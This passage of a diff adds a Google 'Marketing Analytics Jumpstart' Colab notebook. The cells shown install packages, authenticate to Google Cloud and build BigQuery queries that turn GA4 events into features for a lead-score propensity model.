"padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "798f3dabcdbc4b5d8a158865c4d57ec6": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ButtonStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ButtonStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "button_color": null, + "font_weight": "" + } + } + } + } + }, + "cells": [ + { + "cell_type": "code", + "source": [ + "# Copyright 2025 Google LLC\n", + "#\n", + "# Licensed under the Apache License, Version 2.0 (the \"License\");\n", + "# you may not use this file except in compliance with the License.\n", + "# You may obtain a copy of the License at\n", + "#\n", + "# https://www.apache.org/licenses/LICENSE-2.0\n", + "#\n", + "# Unless required by applicable law or agreed to in writing, software\n", + "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", + "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", + "# See the License for the specific language governing permissions and\n", + "# limitations under the License." + ], + "metadata": { + "id": "YMdNqXlGhlGe" + }, + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "# Marketing Analytics Jumpstart - Recommended Events Analysis\n", + "\n", + "\n", + " \n", + " \n", + " \n", + " \n", + "
\n", + " \n", + " \"Google
Run in Colab\n", + "
\n", + "
\n", + " \n", + " \"Google
Run in Colab Enterprise\n", + "
\n", + "
\n", + " \n", + " \"GitHub
View on GitHub\n", + "
\n", + "
\n", + " \n", + " \"Vertex
Open in Vertex AI Workbench\n", + "
\n", + "
" + ], + "metadata": { + "id": "QxuNPr8chwSd" + } + }, + { + "cell_type": "markdown", + "source": [ + "* Author: Federico Patota - fpatota@google.com\n", + "\n", + "* Latest revision: January 24, 2025" + ], + "metadata": { + "id": "D1vh1W0Jnw2I" + } + }, + { + "cell_type": "markdown", + "source": [ + "\n", + "### Description\n", + "This notebook is used to perform an exploratory data analysis (EDA) and generate a data profiling report for Google Analytics 4 (GA4) data stored in BigQuery.\n", + "\n", + "The goal is to support the marketing team in selecting a short list of events to use for building a lead score propensity model.\n", + "\n", + "This notebook also leverages Vertex AI and Gemini to generate an initial recommendation based on the output of the Events Analysis.\n", + "\n", + "### Requirements\n", + "- You have a Google Cloud project with BigQuery and Vertex AI APIs enabled.\n", + "- You have exported GA4 data to BigQuery using the [integrated connector](https://support.google.com/analytics/answer/9358801?hl=en)\n", + "- You have the necessary permissions to access the data and run queries in BigQuery.\n", + "- You have already identified a *target event* that you want to use in the propensity model.\n", + "- You have good knowledge of data analysis concepts.\n", + "\n", + "Estimated Analysis time is around **30-40 minutes**." + ], + "metadata": { + "id": "5dnkb4D_XDzD" + } + }, + { + "cell_type": "code", + "source": [ + "# @title Step 1 – Installing the required Python packages\n", + "# @markdown Click the ( β–Ά ) button to ensure that the required packages are installed:\n", + "# @markdown * [google-cloud-bigquery](https://pypi.org/project/google-cloud-bigquery/)\n", + "# @markdown * [vertexai](https://pypi.org/project/vertexai/)\n", + "# @markdown * [pandas](https://pypi.org/project/pandas/)\n", + "# @markdown * [numpy](https://pypi.org/project/numpy/)\n", + "# @markdown * [scipy](https://pypi.org/project/scipy/)\n", + "# @markdown * [ydata-profiling](https://pypi.org/project/ydata-profiling/)\n", + "# @markdown * [ipywidgets](https://pypi.org/project/ipywidgets/)\n", + "\n", + "# The following libraries should come pre-installed when using Colab or Jupyter\n", + "# They will also be reimported in the next cell in case some packages are\n", + "# installed and the environment needs to be restarted\n", + "\n", + "# Standard library\n", + "import sys\n", + "import importlib\n", + "import time\n", + "\n", + "# IPython\n", + "from IPython.display import display, Markdown, clear_output\n", + "from IPython import Application\n", + "\n", + "def install_packages(package_name_list):\n", + " \"\"\"\n", + " Installs the specified packages.\n", + "\n", + " Args:\n", + " package_name_list: A list of package names to be installed.\n", + "\n", + " Returns:\n", + " True if the package was installed, False otherwise.\n", + " \"\"\"\n", + " added_packages = False\n", + " already_installed_list = !pip list\n", + " already_installed = \" \".join(already_installed_list)\n", + " for package_name in package_name_list:\n", + " if package_name in already_installed:\n", + " print(f\"Package {package_name} already present\")\n", + " else:\n", + " print(f\"Installing {package_name}\")\n", + " !pip install {package_name} --quiet\n", + " print(\"Package installed\")\n", + " added_packages = True\n", + " clear_output(wait=True)\n", + " return added_packages\n", + "\n", + "packages = [\"google-cloud-bigquery\",\n", + " \"vertexai\",\n", + " \"pandas\",\n", + " \"numpy\",\n", + " \"scipy\",\n", + " 
\"ydata-profiling\",\n", + " \"ipywidgets\"]\n", + "\n", + "added_packages = install_packages(packages)\n", + "\n", + "# Clearing the display after the install\n", + "clear_output(wait=True)\n", + "\n", + "if added_packages:\n", + " output = \"\"\"### Packages have been installed. Restarting runtime.\n", + " ### Please wait a few seconds and then proceed to the next step.\"\"\"\n", + " display(Markdown(output))\n", + " Application.instance().kernel.do_shutdown(True)\n", + "else:\n", + " output = \"### All packages are ready for use. You can proceed to the next step.\"\n", + " display(Markdown(output))" + ], + "metadata": { + "id": "KROlY0OtgZsm", + "colab": { + "base_uri": "https://localhost:8080/", + "height": 58 + }, + "outputId": "98372924-212d-493a-da9d-a534dfbd7d6c", + "cellView": "form" + }, + "execution_count": 4, + "outputs": [ + { + "output_type": "display_data", + "data": { + "text/plain": [ + "" + ], + "text/markdown": "### All packages are ready for use. You can proceed to the next step." + }, + "metadata": {} + } + ] + }, + { + "cell_type": "code", + "source": [ + "# @title Step 2 - Settings, Imports, and Authentication\n", + "\n", + "# @markdown To run the notebook, the following APIs will be enabled for the\n", + "# @markdown specified Google Cloud project:\n", + "# @markdown * [Vertex AI API](https://cloud.google.com/vertex-ai/docs/reference/rest)\n", + "# @markdown * [BigQuery API](https://cloud.google.com/bigquery/docs/reference/rest)\n", + "\n", + "# @markdown Fill the information below and then click the ( β–Ά ) button to update\n", + "# @markdown the settings and authenticate you to Google Cloud.\n", + "\n", + "# @markdown ---\n", + "# @markdown #### Google Cloud Platform (GCP)\n", + "# @markdown Copy the project ID from the \"Project Info\" card in the console [Dashboard](https://console.cloud.google.com/home/dashboard).\n", + "project_id = \"your-project-id\" #@param {type:\"string\"}\n", + "# @markdown Insert the location to use for Vertex AI. You can find\n", + "# @markdown [here](https://cloud.google.com/vertex-ai/generative-ai/docs/learn/locations#genai-locations)\n", + "# @markdown a list of all possible locations. 
If a valid location\n", + "# @markdown is not specified, `us-central1` will be used.\n", + "vertex_ai_location = \"us-central1\" #@param {type:\"string\"}\n", + "# @markdown ---\n", + "# @markdown #### Google Analytics 4 (GA4)\n", + "# @markdown For a quick installation, copy the GA4 property ID.\n", + "# @markdown You will find it in your GA4 console, under Admin settings.\n", + "ga4_property_id = \"123456789\" #@param {type:\"string\"}\n", + "# @markdown ---\n", + "\n", + "# Standard library\n", + "import sys\n", + "import importlib\n", + "import time\n", + "import datetime\n", + "import math\n", + "import base64\n", + "\n", + "# Google Cloud Platform\n", + "using_colab = \"google.colab\" in sys.modules\n", + "if using_colab:\n", + " from google.colab import auth, data_table\n", + "from google.cloud import bigquery\n", + "import vertexai\n", + "from vertexai.generative_models import GenerationConfig, GenerativeModel, Part\n", + "\n", + "# Third-party libraries\n", + "import numpy as np\n", + "import pandas as pd\n", + "import ipywidgets as widgets\n", + "from scipy.stats import chi2_contingency, f_oneway, kruskal\n", + "from ydata_profiling import ProfileReport\n", + "from IPython import Application\n", + "from IPython.display import display, clear_output, Markdown\n", + "\n", + "\n", + "def authenticate_notebook():\n", + " \"\"\"\n", + " Authenticates the Google Colab environment.\n", + " \"\"\"\n", + " global using_colab\n", + " if using_colab:\n", + " print(\"Authenticating the Colab Notebook environment.\")\n", + " auth.authenticate_user()\n", + " print(\"Enabling the Colab dataframe formatter.\")\n", + " data_table.enable_dataframe_formatter()\n", + " else:\n", + " # If not in a Colab, authenticating using gcloud cli\n", + " !gcloud auth login\n", + "\n", + "def set_project_id(project_id):\n", + " \"\"\"\n", + " Sets the Google Cloud project ID.\n", + " \"\"\"\n", + " !gcloud config set project {project_id}\n", + "\n", + "def enable_api(api_name):\n", + " \"\"\"\n", + " Enables a Google Cloud API.\n", + " \"\"\"\n", + " api_enabled = !gcloud services list | grep {api_name}\n", + " if not api_enabled:\n", + " print(f\"Enabling {api_name} API\", end=\"\")\n", + " !gcloud services enable {api_name}\n", + " print(\" - Done.\")\n", + " else:\n", + " print(f\"{api_name} API is already enabled.\")\n", + "\n", + "def validate_gcp_region(location):\n", + " \"\"\"\n", + " Checks if the input string is a valid GCP region.\n", + " \"\"\"\n", + " location_check = !gcloud compute regions list | grep {location}\n", + " if location_check:\n", + " return True\n", + " else:\n", + " return False\n", + "\n", + "def initialize_vertex_ai(project_id, gcp_location):\n", + " \"\"\"\n", + " Initiates the Vertex AI SDK.\n", + " \"\"\"\n", + " print(f\"Initiating the Vertex AI SDK.\", end=\"\")\n", + " vertexai.init(project=project_id, location=vertex_ai_location)\n", + " print(\" - Done.\")\n", + "\n", + "def initialize_bigquery(project_id):\n", + " \"\"\"\n", + " Initializes the BigQuery client.\n", + " \"\"\"\n", + " print(\"Initiating the BigQuery Client\", end=\"\")\n", + " bq_client = bigquery.Client(project=project_id)\n", + " print(\" - Done.\")\n", + " return bq_client\n", + "\n", + "# --- Main execution block ---\n", + "authenticate_notebook()\n", + "set_project_id(project_id)\n", + "enable_api(\"bigquery.googleapis.com\") # BigQuery API\n", + "enable_api(\"aiplatform.googleapis.com\") # VertexAI API\n", + "\n", + "# Validating the provided VertexAI location\n", + "if not 
validate_gcp_region(vertex_ai_location):\n", + " print(f\"Invalid VertexAI location. Using default value.\")\n", + " vertex_ai_location = \"us-central1\"\n", + "\n", + "# Initializing VertexAI SDK\n", + "initialize_vertex_ai(project_id, vertex_ai_location)\n", + "\n", + "# Initializing the BQ Client\n", + "bq_client = initialize_bigquery(project_id)\n", + "\n", + "# When importing data from GA4 to BigQuery the default connector uses\n", + "# a specific naming convention for datasets and tables. Specifically\n", + "# the id of the dataset uses the GA4 property ID as a suffix and the\n", + "# table containing the GA4 events is named using the pattern\n", + "# 'events_YYYYMMDD'. Using 'events_*' as table ID allow us to query\n", + "# the right table regardless of the import date.\n", + "\n", + "dataset_id_suffix = ga4_property_id\n", + "location = \"\"\n", + "dataset_id = \"\"\n", + "table_id = \"events_*\"\n", + "\n", + "# Iterate through datasets and find the one with the matching suffix\n", + "for dataset in bq_client.list_datasets():\n", + " dataset_id = dataset.dataset_id\n", + " if dataset_id.endswith(dataset_id_suffix):\n", + " dataset_ref = bq_client.get_dataset(dataset.reference)\n", + " location = dataset_ref.location\n", + " print(f\"GA4 Dataset ID: {dataset_id}, Location: {location}\")\n", + " time.sleep(1)\n", + " clear_output(wait=True)\n", + " display(Markdown(\"### Done. You can proceed to the next step.\"))\n", + " break\n", + "else:\n", + " time.sleep(1)\n", + " clear_output(wait=True)\n", + " print(f\"No dataset found with ID suffix: {dataset_id_suffix}\")" + ], + "metadata": { + "id": "0fcNmQ51lx9e", + "colab": { + "base_uri": "https://localhost:8080/", + "height": 58 + }, + "outputId": "9539ceb5-bb02-4fd8-97e3-802f1d0c337e", + "cellView": "form" + }, + "execution_count": 5, + "outputs": [ + { + "output_type": "display_data", + "data": { + "text/plain": [ + "" + ], + "text/markdown": "### Done. You can proceed to the next step." 
+ }, + "metadata": {} + } + ] + }, + { + "cell_type": "code", + "source": [ + "# @title Step 3 - Importing GA4 data from BigQuery\n", + "\n", + "def run_bq_job_with_progress(bq_client: bigquery.Client,\n", + " query: str) -> bigquery.job.query.QueryJob:\n", + " \"\"\"\n", + " Runs a BigQuery job while displaying elapsed time.\n", + " \"\"\"\n", + " job = bq_client.query(query)\n", + " start = time.time()\n", + " print(\"|\", end=\"\")\n", + " count = 0\n", + " while job.running():\n", + " count += 1\n", + " # Printing the elapsed time approximately every [40 x 0.5] = 20 seconds\n", + " if count % 40 == 0:\n", + " elapsed_time = time.time() - start\n", + " minutes = str(math.floor(elapsed_time/60)).zfill(2)\n", + " seconds = str(round(elapsed_time%60)).zfill(2)\n", + " print(f\"-| {minutes}m:{seconds}s elapsed.\")\n", + " print(\"|\", end=\"\")\n", + " else:\n", + " print(\"-\",end=\"\")\n", + " # Iterating every 0.5 seconds\n", + " time.sleep(0.5)\n", + " print(\"-> Done!\")\n", + " job_duration = time.time() - start\n", + " minutes = str(math.floor(job_duration/60)).zfill(2)\n", + " seconds = str(round(job_duration%60)).zfill(2)\n", + " print(f\"The job duration was {minutes}m:{seconds}s.\")\n", + " return job\n", + "\n", + "def get_event_names() -> list:\n", + " \"\"\"\n", + " Retrieves a list of event names from a BigQuery table.\n", + " \"\"\"\n", + " global table_ref\n", + " # SQL query to fetch event names\n", + " event_list_query = f\"\"\"\n", + " SELECT DISTINCT event_name\n", + " FROM `{table_ref}`\n", + " ORDER BY event_name DESC\n", + " \"\"\"\n", + "\n", + " # Execute the query\n", + " print(f\"Retrieving the list of events from {table_ref}.\")\n", + " print(\"This takes on average less than 1 minute.\")\n", + "\n", + " job = run_bq_job_with_progress(bq_client, event_list_query)\n", + "\n", + " event_names = [row.event_name for row in job.result()]\n", + " return event_names\n", + "\n", + "def generate_events_checkboxes(confirm_target_button):\n", + " \"\"\"\n", + " Generates a list of checkboxes for the available events.\n", + " \"\"\"\n", + " global target_dropdown_widget, events_checkboxes, target\n", + " global confirm_features_button\n", + " target = target_dropdown_widget.value\n", + " if not target:\n", + " print(\"Please select a target event.\")\n", + " return\n", + "\n", + " # Clearing the output in case the confirm target button gets clicked again\n", + " clear_output(wait=True)\n", + "\n", + " output = \"\"\"\n", + " ## Events Selection\n", + "\n", + " ### Select a target event and confirm your selection.\n", + " \"\"\"\n", + "\n", + " hbox = widgets.HBox([target_dropdown_widget, confirm_target_button])\n", + " display(Markdown(output), hbox)\n", + "\n", + " events_checkboxes = []\n", + "\n", + " # Create checkboxes for event selection\n", + " for event_name in event_names:\n", + " if event_name != target:\n", + " events_checkboxes.append(\n", + " widgets.Checkbox(value=False, description=event_name, indent=False))\n", + "\n", + " confirm_features_button.on_click(process_events_data)\n", + "\n", + " grid = widgets.GridBox(events_checkboxes,\n", + " layout=widgets.Layout(\n", + " grid_template_columns=f\"repeat(3, 1fr)\"))\n", + "\n", + " output = \"\"\"\n", + " ### Select 1 or more feature events and confirm your selection.\n", + " \"\"\"\n", + "\n", + " display(Markdown(output), confirm_features_button, grid)\n", + "\n", + "def build_etl_query() -> str:\n", + " \"\"\"\n", + " Builds the ETL query to be executed in BigQuery.\n", + " \"\"\"\n", + " global table_ref, 
start_date, end_date, rolling_window, sampling_percent\n", + " global random_sampling, limit_rows, target, selected_events\n", + "\n", + " start_date_sql = start_date.strftime(\"%Y%m%d\")\n", + " end_date_sql = end_date.strftime(\"%Y%m%d\")\n", + "\n", + " features_with_target = [target] + selected_events\n", + "\n", + " etl_query = f\"\"\"\n", + " CREATE OR REPLACE TEMP TABLE dates_interval as (\n", + " SELECT DISTINCT\n", + " -- Select each distinct event_date as 'input_date',\n", + " -- representing the current date in the analysis\n", + " PARSE_DATE('%Y%m%d',event_date) as input_date,\n", + " -- Calculate the 'end_date' by subtracting a specified\n", + " -- interval from the 'input_date'\n", + " DATE_SUB(PARSE_DATE('%Y%m%d',event_date),\n", + " INTERVAL {rolling_window} DAY) as end_date\n", + " FROM `{table_ref}`\n", + " -- The time interval of {date_range_length} days\n", + " WHERE event_date BETWEEN '{start_date_sql}' AND '{end_date_sql}'\n", + " ORDER BY input_date DESC\n", + " );\n", + "\n", + " CREATE OR REPLACE TEMP TABLE events_users as (\n", + " SELECT DISTINCT\n", + " -- User identifier\n", + " Users.user_pseudo_id,\n", + " -- Date for which the feature is being calculated\n", + " DI.input_date as feature_date\n", + " FROM `{table_ref}` Users\n", + " CROSS JOIN dates_interval as DI\n", + " WHERE PARSE_DATE('%Y%m%d',Users.event_date)\n", + " BETWEEN DI.end_date AND DI.input_date\n", + " );\n", + " \"\"\"\n", + "\n", + " outer_join_string = \"\"\n", + " coalesce_string = \"\"\n", + "\n", + " for count, event in enumerate(features_with_target):\n", + " etl_query += f\"\"\"\n", + " CREATE OR REPLACE TEMP TABLE rolling_{event}_past_days AS (\n", + " SELECT user_pseudo_id, input_date as feature_date,\n", + " -- Number of distinct {event} events the user generated\n", + " -- in the past {rolling_window} days.\n", + " MAX(COUNT(DISTINCT CASE DATE_DIFF(input_date,\n", + " PARSE_DATE('%Y%m%d',event_date), DAY) BETWEEN 1 AND {rolling_window}\n", + " WHEN TRUE THEN event_timestamp END))\n", + " OVER(PARTITION BY user_pseudo_id, input_date) AS {event}_past_{rolling_window}_days\n", + " FROM `{table_ref}` as E\n", + " CROSS JOIN dates_interval as DI\n", + " -- Filter events in the specified date range\n", + " WHERE PARSE_DATE('%Y%m%d',E.event_date)\n", + " BETWEEN DI.end_date AND DI.input_date\n", + " -- Consider only events of the specific type\n", + " AND event_name='{event}'\n", + " -- Grouping by user_pseudo_id and feature_date\n", + " GROUP BY user_pseudo_id, feature_date\n", + " );\n", + " \"\"\"\n", + "\n", + " coalesce_string += f\"COALESCE(T{count}.{event}_past_{rolling_window}_days,\\\n", + " 0) AS {event}_past_{rolling_window}_days,\"\n", + "\n", + " outer_join_string += f\"\"\"\n", + " FULL OUTER JOIN rolling_{event}_past_days AS T{count}\n", + " ON EUD.user_pseudo_id = T{count}.user_pseudo_id\n", + " AND EUD.feature_date = T{count}.feature_date\"\"\"\n", + "\n", + " etl_query += f\"\"\"\n", + " CREATE OR REPLACE TEMP TABLE etl_result AS (\n", + " SELECT DISTINCT\n", + " -- Date for which the features are calculated\n", + " EUD.feature_date,\n", + " -- User identifier\n", + " EUD.user_pseudo_id,\n", + " {coalesce_string}\n", + " FROM events_users AS EUD\n", + " -- This performs a full outer join, which combines all rows from both tables, including those that don't have matching values.\n", + " {outer_join_string}\n", + " -- This filters the results to include only rows where the user_pseudo_id is not null\n", + " WHERE EUD.user_pseudo_id IS NOT NULL\n", + " ); -- Ordering by the 
target feature\n", + "\n", + " SELECT * EXCEPT (feature_date, user_pseudo_id) FROM etl_result\n", + " TABLESAMPLE SYSTEM ({sampling_percent} PERCENT)\n", + " WHERE rand() < {random_sampling}\n", + " LIMIT {limit_rows};\n", + " \"\"\"\n", + "\n", + " return etl_query\n", + "\n", + "# Function to handle button click and build follow-up query\n", + "def process_events_data(confirm_features_button):\n", + " global table_ref, start_date, end_date, rolling_window, target\n", + " global selected_events, events_checkboxes, bqdf\n", + "\n", + " # Adding the selected features in a list\n", + " selected_events= [\n", + " checkbox.description for checkbox in events_checkboxes if checkbox.value]\n", + "\n", + " # At least an event should be selected\n", + " if not selected_events:\n", + " print(\"Please select at least one event to be used for features.\")\n", + " return\n", + "\n", + " time.sleep(1)\n", + " clear_output(wait=True)\n", + "\n", + " print(f\"Selected target event: {target}\")\n", + " print(f\"Selected events to be used for features: {selected_events}\")\n", + "\n", + " features_count = len(selected_events)\n", + "\n", + " # Estimating the query execution time\n", + " best_mins = round((1+features_count)*0.5) # Best case\n", + " worst_mins = 1+features_count # Worst case\n", + "\n", + " print(f\"The processing should take between {best_mins} and {worst_mins} minutes.\")\n", + "\n", + " etl_query = build_etl_query()\n", + "\n", + " # Execute the query\n", + " job = run_bq_job_with_progress(bq_client, etl_query)\n", + "\n", + " time.sleep(1)\n", + " clear_output(wait=True)\n", + "\n", + " print(\"Saving the results in a dataframe.\")\n", + " bqdf = job.to_dataframe(progress_bar_type='tqdm_notebook')\n", + "\n", + " time.sleep(1)\n", + " clear_output(wait=True)\n", + "\n", + " output_prefix = f\"\"\"\n", + " ### Data extraction and transformation completed\n", + " * Selected target event: *{target}*\n", + " * Selected {len(selected_events)} feature events that will be used for analysis:\n", + " ***{'***, ***'.join(selected_events)}***\n", + " \"\"\"\n", + " output_suffix = \"\"\"\n", + " ### You can proceed to the next step.\n", + " \"\"\"\n", + "\n", + " display(Markdown(output_prefix), Markdown(output_suffix))\n", + "\n", + "# --- Main execution block --- #\n", + "\n", + "end_date = datetime.datetime.today()\n", + "date_range_length = 30\n", + "start_date = end_date - datetime.timedelta(days=date_range_length)\n", + "rolling_window = 7\n", + "\n", + "# @markdown Because the amount of data generated by GA4 is very large\n", + "# @markdown and not ready for exploration, some data selection and aggregation\n", + "# @markdown are needed.\n", + "\n", + "# @markdown ---\n", + "# @markdown #### Filtering and Aggregating GA4 Data\n", + "# @markdown By default, only the data from the last 30 days will be used,\n", + "# @markdown aggregated using 7-days rolling windows.\n", + "# @markdown To change this setting, tick the checkbox below and select a\n", + "# @markdown different date interval and rolling window length.\n", + "\n", + "use_custom_range = False # @param {\"type\":\"boolean\"}\n", + "custom_start_date = \"2024-01-24\" # @param {\"type\":\"date\"}\n", + "custom_end_date = \"2025-01-24\" # @param {\"type\":\"date\"}\n", + "custom_rolling_window = 30 # @param {\"type\":\"integer\"}\n", + "\n", + "# @markdown The default settings will be applied regardless of the checkbox if:\n", + "# @markdown * The specified date range is smaller than the rolling window.\n", + "# @markdown * The difference 
between end date and start date is 1 day or less.\n", + "# @markdown * The specified rolling window value is less than 1.\n", + "# @markdown * The specified end date is in the future.\n", + "\n", + "# Converting the dates to datetime objects\n", + "custom_start_date = datetime.datetime.strptime(custom_start_date, \"%Y-%m-%d\")\n", + "custom_end_date = datetime.datetime.strptime(custom_end_date, \"%Y-%m-%d\")\n", + "custom_date_range_length = (custom_end_date - custom_start_date).days\n", + "\n", + "if use_custom_range:\n", + " try:\n", + " if custom_end_date > datetime.datetime.today():\n", + " print(\"The start date is in the future.\")\n", + " # End date in the future\n", + " raise ValueError\n", + " if custom_date_range_length <= 1:\n", + " # Range shorter than 1 day\n", + " print(\"The specified date range is less than 1 day.\")\n", + " raise ValueError\n", + " if custom_date_range_length < custom_rolling_window:\n", + " # Range shorter than the rolling window\n", + " print(\"The specified date range is shorter than the rolling window.\")\n", + " raise ValueError\n", + " if custom_rolling_window < 1:\n", + " # Rolling window too small\n", + " print(\"The specified rolling window is less than 1 day.\")\n", + " raise ValueError\n", + " start_date = custom_start_date\n", + " end_date = custom_end_date\n", + " date_range_length = custom_date_range_length\n", + " rolling_window = custom_rolling_window\n", + " except ValueError:\n", + " print(\"The specified custom date range is invalid. Using default values.\")\n", + "\n", + "print(f\"\"\"\n", + "Date range: {start_date.strftime(\"%Y-%m-%d\")} - {end_date.strftime(\"%Y-%m-%d\")}.\n", + "Date range length: {date_range_length} day{'s' if rolling_window > 1 else ''}.\n", + "Rolling window length: {rolling_window} day{'s' if rolling_window > 1 else ''}.\n", + "\"\"\")\n", + "\n", + "# @markdown ---\n", + "\n", + "# @markdown #### Event Selection\n", + "# @markdown 1. Click the ( β–Ά ) button to import the list of available events\n", + "# @markdown from BigQuery. This should take approximately 30 seconds.\n", + "# @markdown 2. When the import is complete, a drop-down menu and a\n", + "# @markdown \"Confirm Target\" button will appear. Select the target event from\n", + "# @markdown the drop-down menu and click \"Confirm Target\".\n", + "# @markdown 3. A list of checkboxes for all the remaining events will appear.\n", + "# @markdown Tick the checkboxes of the events that you want to include in the\n", + "# @markdown exploratory data analysis and click the \"Confirm Features\" button.\n", + "# @markdown 4. Wait for the execution to complete. 
This step should take between\n", + "# @markdown 30 and 60 seconds for each selected event (including the target).\n", + "\n", + "# Construct the full table ID\n", + "table_ref = f\"{project_id}.{dataset_id}.{table_id}\"\n", + "# The variable that will contain the target event\n", + "target = None\n", + "# Button for confirming dropdown target feature\n", + "confirm_target_button = widgets.Button(description=\"Confirm Target\")\n", + "# Button for confirming the selected features\n", + "confirm_features_button = widgets.Button(description=\"Confirm Features\")\n", + "# List that will contain the checkboxes to select the events used for features\n", + "events_checkboxes = []\n", + "# Lists containing only the selected events that will be processed as features\n", + "selected_events= []\n", + "# Sampling percent (via tablesample method)\n", + "sampling_percent = 10\n", + "# Random subsampling\n", + "random_sampling = 0.1\n", + "# Limit of rows to load in the dataframe\n", + "limit_rows = 50000\n", + "# The dataframe containing the results\n", + "bqdf = None\n", + "\n", + "event_names = get_event_names()\n", + "\n", + "time.sleep(1)\n", + "clear_output(wait=True)\n", + "\n", + "output = \"\"\"\n", + "### Events Selection\n", + "\n", + "Select a target event and confirm your selection\n", + "\"\"\"\n", + "\n", + "# Dropdown widget for target event selection\n", + "target_dropdown_widget = widgets.Dropdown(\n", + " options=event_names,\n", + " description='Target:',\n", + " disabled=False,\n", + ")\n", + "\n", + "confirm_target_button.on_click(generate_events_checkboxes)\n", + "\n", + "hbox = widgets.HBox([target_dropdown_widget, confirm_target_button])\n", + "display(Markdown(output), hbox)" + ], + "metadata": { + "colab": { + "base_uri": "https://localhost:8080/", + "height": 152, + "referenced_widgets": [ + "510a3c2ce1f249c291aeaa8ea214a127", + "dd70738e3b794fff8c79a13d8dedc202", + "b1fc882904974aacaa704e8e1f871227", + "5240f36b552e48eeb8d3ddcbeaf9f004", + "f25457004bb5499aa7301831d9337ab7", + "7bea3caf6e954ec4850290f791b790db", + "b55f0d2197ef4068979e6ac7613658c1", + "c5fb7e585532423f85122c3e4d118bea", + "a7e3ea48a523462daeac82d4f5640101", + "bc83fabc3fd04f66aa62826ac7014f1f", + "dabe307bb3814c0b928f4e6afe5e8bc8", + "c2b1c7eb19aa431ab36f63e725062225", + "becaf358ea92408781b9fed526032216", + "cb59e53ee06f4cdcba6970997af52a0d", + "435c30134cab4d30b02115b45315c96f", + "cb90e799babe4000a2385a42835715dc", + "4dab22eea30f4879b69c42957bee96dc", + "158f1d53adf54c528eb0c290c1bf38a7", + "0cebc5f02aed4a96a4bc46a1123e83f2", + "069ad5938cc44d1b98c0b715c120e2fb", + "29490473f86c4224b40f1bc14dcf4126", + "d76a2a87928a4feaa388e906e3dba5c0", + "f106dfaad61d4048a9dee141dbfc70f8", + "27093f0b59604748b47e1011ade33069", + "b98edc06317d4ba68678baade932be80", + "7506fba59d244542a9f950d865375a7f", + "0860bfa9645f406e81b47285a8c5ea94", + "7e36b5eab7b74d2fac02312aec136228", + "b18c8b6f127241458d6304b8e43d0b40", + "377fb1783fae4079a4406df02b6a2840", + "09d4235a91e34e84b8b773cebc19a854", + "cd912a4adae54ba8a2c32dc01402c523", + "81fdbc9e894a4ba39f19eea43a6935f2", + "72eebc41731d4dafbd2a4528032bdf11", + "ce94c729917848e8b98b965163e4466b", + "16031519618548678483de6e12dd3245", + "09fce7da46184625a657e076f89ffbad", + "fe4d60abead4406dbac0e54e6384f787", + "fb03611950c8499a9078544ba5eeefa3", + "d1d9f57fa9fa42d797325eed00664ed8", + "2ff572bb94534bae8dfa5b61bb36adfd", + "903f3582fe194b61b062f6575cadf380", + "4da6287f1f5140228c1cbbe3e9873ea0", + "fc2e0535ede24be5a2b28ff37b307475", + "50a2eed8e87a4b3fbe4f7a31d5c54a5c", + 
"28580af1f9e54bbe99dd7ef9b3e1c7c0", + "f2e199b4f49d4beda16da275bad92312", + "2280d04b76b34456a3e0ebb257cbb58d", + "9e14f8ccc46a415382508d2f398801b1", + "6cc57addbbe3499fae8d82188d6cc466", + "2a36fd87b7e048ab80b41250b2444cff", + "6f80b1fdc1a645dda301f305c3fcfa3c", + "d5d5d1041afb49fba74e2010a8b517ef", + "df4a6c1954694ebd9078d2bbce331c0c", + "d6ea703fef6a40648d33940ea0533477", + "674f1b434cc248398e785c641cccf6a3", + "712af8b20d414f7eae375231b30ebf93", + "ff5753360adf4971b513dc197a10ba12", + "472b0409a6784d7e8595d430074b4976", + "fbf924f270ad49b4ae7fe6d33f3de998", + "e1869fb4d1a54d7b91db2a714bc8ab69", + "e99040a596774e35b013e07b97d59aa6", + "416e7a5741484457b37ee2cc6cb46769", + "5abc6dd6fc8a42cfac748645d7d5120d", + "f0571918d4964cb0a4e8c78b7dc5b81d", + "ee01fb5c76c6479a9764e8e8c7deeb24", + "dd9432faf01e49f7b645575d9422a4df", + "b11bbb17f64a4cb88670c3251361abc1", + "008431306c25440584e45566ef6e2ef3", + "5b64a9e9922f406f8834ebac63a09ca8", + "682288ea4e1440d3974262dfffefc51a", + "8dfc8df4b9f241cf901c3fbb86554cd8", + "68a0bbe8687e4db9b87542ef7023345f", + "70a89485f8eb4c9680ccdb6e20041f65", + "6009ba22e5134b42a48038970f8a8087", + "25374e0a7ab5466bbcedf7cf15974c4f", + "3be07a9a36c14e609506a8d2ac30439a", + "e43a24fb4e5c4fdcb39febd5fb66ab45", + "13942a8909f945c395d55f92033505ff", + "51fc19877c544160ba1f98487b04d612", + "eedd93a671824bde815adb53be8171d4", + "b02ed3fb150a4688b13ebcde50c08ffb", + "e03e968d53544e44bb8aee7f544f1bb7", + "c4e4e8e3c9d748ffb96f74c1e7d06456", + "6e467383b0df416ea690cbd818bceba2", + "f4e0a99311504204a79f48de9ec95280", + "d8fffd09966f40cd8f443d6083121fbf", + "2fa658f90da941b6a590c278c67e548e", + "32a25d57545340c18731eb25a79e8b47", + "f0da6d221d02448bba7dc60802325cfd", + "e17a16c5dc694b899e1e44f3be7583e5", + "bd92677245d34eaa9245935dd5a20932", + "4b9b4d011c1c4ccc886e6141ce25f235", + "74a8b740324c4efead37803b886a7921", + "56fcef4dc65e40e087bbb2821874af17", + "8673a30c6d5a4f419020438fd49b2859", + "346c028bf83344f6b6b4ac47d243a3f0", + "574170a8682d444abdb3a4762b7fc0e5", + "58b355bd18364678a41ca309605018a5", + "8f02fdb7148e4970b349c624f4bdf198", + "bf52704eb9744bc996a1f98bb2b1698d", + "a2855718cc134441a42da59e40da45b7", + "b49ac81502e049ff8c2306bb2b649c9b", + "46c4c21d611e4fd591fa5f7c35854240", + "c7f6a1a793f540f7b455e6e5c333e784", + "dc26ec5c563e4d8894d2e8597326a451", + "bfb1e9039ae14006b3ce1f52e37361c0", + 